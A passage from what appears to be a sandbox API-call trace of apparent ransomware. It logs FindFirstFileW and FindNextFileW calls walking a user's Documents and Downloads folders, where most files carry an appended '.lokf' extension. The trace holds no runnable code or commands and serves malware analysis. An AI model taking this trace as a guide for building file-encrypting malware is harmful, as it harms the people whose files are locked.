ftCreationTime.dwHighDateTime=0x1d4c568, ftLastAccessTime.dwLowDateTime=0x7121a170, ftLastAccessTime.dwHighDateTime=0x1d4d43d, ftLastWriteTime.dwLowDateTime=0x202c7490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1c21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SzTS.pps.lokf", cAlternateFileName="SZTSPP~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f7c60, ftCreationTime.dwHighDateTime=0x1d4cd21, ftLastAccessTime.dwLowDateTime=0x34f8fc90, ftLastAccessTime.dwHighDateTime=0x1d4c6da, ftLastWriteTime.dwLowDateTime=0x202c7490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11ee6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U7Qf8.mp4.lokf", cAlternateFileName="U7QF8M~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbeda60, ftCreationTime.dwHighDateTime=0x1d4c9a5, ftLastAccessTime.dwLowDateTime=0x429e60b0, ftLastAccessTime.dwHighDateTime=0x1d4cf86, ftLastWriteTime.dwLowDateTime=0x202ed5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1592a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vXRE_K.mp3.lokf", cAlternateFileName="VXRE_K~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c201d0, ftCreationTime.dwHighDateTime=0x1d4c904, ftLastAccessTime.dwLowDateTime=0x42cadd20, ftLastAccessTime.dwHighDateTime=0x1d4cb8f, ftLastWriteTime.dwLowDateTime=0x202ed5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJT0OcisPj-xq.jpg.lokf", cAlternateFileName="XJT0OC~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964ee260, ftCreationTime.dwHighDateTime=0x1d4d045, ftLastAccessTime.dwLowDateTime=0xfe86900, ftLastAccessTime.dwHighDateTime=0x1d4ca9e, ftLastWriteTime.dwLowDateTime=0x20313750, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x37bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xrWMPRPigWwu3vXxOU1.wav.lokf", cAlternateFileName="XRWMPR~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17eff0, ftCreationTime.dwHighDateTime=0x1d4cb54, ftLastAccessTime.dwLowDateTime=0x1b3496f0, ftLastAccessTime.dwHighDateTime=0x1d4d2b2, ftLastWriteTime.dwLowDateTime=0x20313750, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZoOnp.swf.lokf", cAlternateFileName="ZOONPS~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87a6ff20, ftCreationTime.dwHighDateTime=0x1d4c859, ftLastAccessTime.dwLowDateTime=0xa6491760, ftLastAccessTime.dwHighDateTime=0x1d4c6e7, ftLastWriteTime.dwLowDateTime=0x203398b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x16f54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyTEBApAQsy0 u.jpg.lokf", cAlternateFileName="ZYTEBA~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacfc63a0, ftCreationTime.dwHighDateTime=0x1d4cc87, ftLastAccessTime.dwLowDateTime=0x1dec9680, ftLastAccessTime.dwHighDateTime=0x1d4c9a8, ftLastWriteTime.dwLowDateTime=0x203398b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x100e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z_xjT1PbK9g5.mp3.lokf", cAlternateFileName="Z_XJT1~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc191, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a.lokf", cAlternateFileName="_FKXFE~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc191, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a.lokf", cAlternateFileName="_FKXFE~1.LOK")) returned 0 [0146.614] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.614] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.614] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.614] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.614] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.614] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.614] PathFindFileNameW (pszPath="") returned="" [0146.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20528a90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20528a90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c20130, ftCreationTime.dwHighDateTime=0x1d577a5, ftLastAccessTime.dwLowDateTime=0x93ba5690, ftLastAccessTime.dwHighDateTime=0x1d58578, ftLastWriteTime.dwLowDateTime=0x20385b70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15e9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-zw2kUwzHbrh6GhQEKb.pptx.lokf", cAlternateFileName="-ZW2KU~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecfb9bf0, ftCreationTime.dwHighDateTime=0x1d50c7f, ftLastAccessTime.dwLowDateTime=0x2fc13690, ftLastAccessTime.dwHighDateTime=0x1d577c2, ftLastWriteTime.dwLowDateTime=0x20385b70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15855, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0LcY86kifJlQ7.xlsx.lokf", cAlternateFileName="0LCY86~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f32e340, ftCreationTime.dwHighDateTime=0x1d55107, ftLastAccessTime.dwLowDateTime=0x21972140, ftLastAccessTime.dwHighDateTime=0x1d55d7f, ftLastWriteTime.dwLowDateTime=0x203abcd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xcbfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="44yienfP0_mk.docx.lokf", cAlternateFileName="44YIEN~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1145690, ftCreationTime.dwHighDateTime=0x1d57765, ftLastAccessTime.dwLowDateTime=0xfd31b9f0, ftLastAccessTime.dwHighDateTime=0x1d58e75, ftLastWriteTime.dwLowDateTime=0x203d1e30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf0dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4QdlKGracmIsfBv8Rj5U.xlsx.lokf", cAlternateFileName="4QDLKG~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11920f0, ftCreationTime.dwHighDateTime=0x1d52a6f, ftLastAccessTime.dwLowDateTime=0xc46c52d0, ftLastAccessTime.dwHighDateTime=0x1d5104c, ftLastWriteTime.dwLowDateTime=0x203d1e30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdfa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aam-uk.xlsx.lokf", cAlternateFileName="AAM-UK~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1cdeff0, ftCreationTime.dwHighDateTime=0x1d4d53a, ftLastAccessTime.dwLowDateTime=0xe5b9dae0, ftLastAccessTime.dwHighDateTime=0x1d4ce82, ftLastWriteTime.dwLowDateTime=0x203f7f90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x122b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ahBvw6Tj3LoXOmjTDa.pptx.lokf", cAlternateFileName="AHBVW6~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d387b0, ftCreationTime.dwHighDateTime=0x1d50f0d, ftLastAccessTime.dwLowDateTime=0xce9c1d60, ftLastAccessTime.dwHighDateTime=0x1d56977, ftLastWriteTime.dwLowDateTime=0x2041e0f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x162b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dY6y1t7mu6jrMGEl.pptx.lokf", cAlternateFileName="DY6Y1T~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef941140, ftCreationTime.dwHighDateTime=0x1d585b9, ftLastAccessTime.dwLowDateTime=0x5e581db0, ftLastAccessTime.dwHighDateTime=0x1d59172, ftLastWriteTime.dwLowDateTime=0x20444250, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xba1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e3Nt7XYdwW.docx.lokf", cAlternateFileName="E3NT7X~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437af540, ftCreationTime.dwHighDateTime=0x1d593ab, ftLastAccessTime.dwLowDateTime=0xb77094b0, ftLastAccessTime.dwHighDateTime=0x1d51a42, ftLastWriteTime.dwLowDateTime=0x2046a3b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11f3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fyZw8q.pptx.lokf", cAlternateFileName="FYZW8Q~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c76720, ftCreationTime.dwHighDateTime=0x1d5443c, ftLastAccessTime.dwLowDateTime=0xbddb4e60, ftLastAccessTime.dwHighDateTime=0x1d58d3f, ftLastWriteTime.dwLowDateTime=0x2046a3b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x125a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iY-CcZnqhK2oNX.xlsx.lokf", cAlternateFileName="IY-CCZ~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109f0170, ftCreationTime.dwHighDateTime=0x1d50a5d, ftLastAccessTime.dwLowDateTime=0xdbe66a50, ftLastAccessTime.dwHighDateTime=0x1d513ca, ftLastWriteTime.dwLowDateTime=0x20490510, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x17746, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jcZ5HOv.docx.lokf", cAlternateFileName="JCZ5HO~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d48050, ftCreationTime.dwHighDateTime=0x1d544aa, ftLastAccessTime.dwLowDateTime=0x89941f80, ftLastAccessTime.dwHighDateTime=0x1d52366, ftLastWriteTime.dwLowDateTime=0x20490510, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1b87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jFhfFrSxF58Y6JuYP.pptx.lokf", cAlternateFileName="JFHFFR~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x625aa6a0, ftCreationTime.dwHighDateTime=0x1d4d366, ftLastAccessTime.dwLowDateTime=0x7a991140, ftLastAccessTime.dwHighDateTime=0x1d4c559, ftLastWriteTime.dwLowDateTime=0x204b6670, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7034, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lJq7q-PX9DWbR8t8z.doc.lokf", cAlternateFileName="LJQ7Q-~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x20a83c10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c774d20, ftCreationTime.dwHighDateTime=0x1d4c565, ftLastAccessTime.dwLowDateTime=0xa9288bc0, ftLastAccessTime.dwHighDateTime=0x1d4cf5a, ftLastWriteTime.dwLowDateTime=0x204dc7d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xda66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q_n6bOaeAdhkjfo2mhI.docx.lokf", cAlternateFileName="Q_N6BO~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x20acfed0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R4I1Q ij0VYYLZ2qE", cAlternateFileName="R4I1QI~1")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb20c760, ftCreationTime.dwHighDateTime=0x1d4c857, ftLastAccessTime.dwLowDateTime=0xd03060c0, ftLastAccessTime.dwHighDateTime=0x1d4cede, ftLastWriteTime.dwLowDateTime=0x204dc7d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe27a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfzjItAk.ots.lokf", cAlternateFileName="SFZJIT~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x946fcb80, ftCreationTime.dwHighDateTime=0x1d55673, ftLastAccessTime.dwLowDateTime=0x65181a70, ftLastAccessTime.dwHighDateTime=0x1d56499, ftLastWriteTime.dwLowDateTime=0x20502930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tfEuvyompjnimS.xlsx.lokf", cAlternateFileName="TFEUVY~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x662fcdf0, ftCreationTime.dwHighDateTime=0x1d5283e, ftLastAccessTime.dwLowDateTime=0xa97b4c40, ftLastAccessTime.dwHighDateTime=0x1d565df, ftLastWriteTime.dwLowDateTime=0x20502930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1680d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvaDFzE.docx.lokf", cAlternateFileName="UVADFZ~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70150a40, ftCreationTime.dwHighDateTime=0x1d54e8d, ftLastAccessTime.dwLowDateTime=0x332545c0, ftLastAccessTime.dwHighDateTime=0x1d52497, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa774, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vShBQE5akxJRPT.pptx.lokf", cAlternateFileName="VSHBQE~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66db64a0, ftCreationTime.dwHighDateTime=0x1d530ac, ftLastAccessTime.dwLowDateTime=0xb8a094e0, ftLastAccessTime.dwHighDateTime=0x1d518b0, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x99d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xe72pRvBTnt.docx.lokf", cAlternateFileName="XE72PR~1.LOK")) returned 1 [0146.615] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 1 [0146.616] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 0 [0146.616] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.616] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.616] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0146.616] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.616] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.616] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.616] PathFindFileNameW (pszPath="") returned="" [0146.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.616] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.616] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, 